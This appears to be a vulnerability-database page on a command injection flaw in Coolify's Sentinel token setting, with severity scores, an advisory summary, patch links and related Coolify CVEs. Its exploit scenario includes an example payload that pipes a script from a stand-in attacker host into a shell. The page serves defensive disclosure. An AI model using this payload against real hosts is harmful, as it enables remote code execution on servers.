Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Editing server Sentinel settings is a privileged/admin action so PR:H; network-reachable web UI keeps AV:N/AC:L, and host command execution gives full C:H/I:H/A:H.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.466, the sentinel_token setting is used in shell commands without sufficient validation, allowing an authenticated user with access to server Sentinel settings to inject shell syntax and execute commands on the host when Sentinel is restarted. This issue is fixed in version 4.0.0-beta.466.
AnalysisAI
Authenticated command injection in Coolify (self-hosted server/application/database management platform) before 4.0.0-beta.466 lets a user with access to a server's Sentinel settings embed shell metacharacters in the sentinel_token value, which is passed unsanitized into a shell command and executed on the host the next time Sentinel is restarted (CWE-78). The flaw yields full host command execution with confidentiality, integrity, and availability impact. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires an authenticated Coolify account with permission to view and modify a target server's Sentinel monitoring settings (the sentinel_token field), and the Sentinel monitoring agent must be in use on that server. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, 8.8) frames this as a high-severity, low-complexity, network-reachable flaw requiring only low privileges. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A malicious or compromised Coolify user who holds server-management rights opens a managed server's Sentinel settings and sets the token to a value such as x`curl http://attacker/x.sh|sh` (or a $()/; payload). When Sentinel is next restarted - either by the attacker triggering it or during normal operations - the payload is expanded by the host shell and runs attacker-chosen commands on the server. … |
| Remediation | Vendor-released patch: v4.0.0-beta.466 - upgrade Coolify to 4.0.0-beta.466 or later, which fixes the input validation of sentinel_token (upstream fix commit https://github.com/coollabsio/coolify/commit/096d4369e59b3db7ace2db3ca42588c41b9b6019; advisory https://github.com/coollabsio/coolify/security/advisories/GHSA-rpr8-p7jc-x844; release https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.466). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all Coolify deployments and document current versions; within 7 days: deploy v4.0.0-beta.466 or later across all instances (test in staging first to validate compatibility); within 30 days: audit access controls to Sentinel settings and implement principle-of-least-privilege restrictions on server configuration roles.
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application
Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba
Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,
Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap
Coolify versions prior to v4.0.0-beta.420.7 are vulnerable to a remote code execution vulnerability in the project deplo
Coolify versions prior to v4.0.0-beta.420.6 are vulnerable to a remote code execution vulnerability in the application d
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authentica
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41987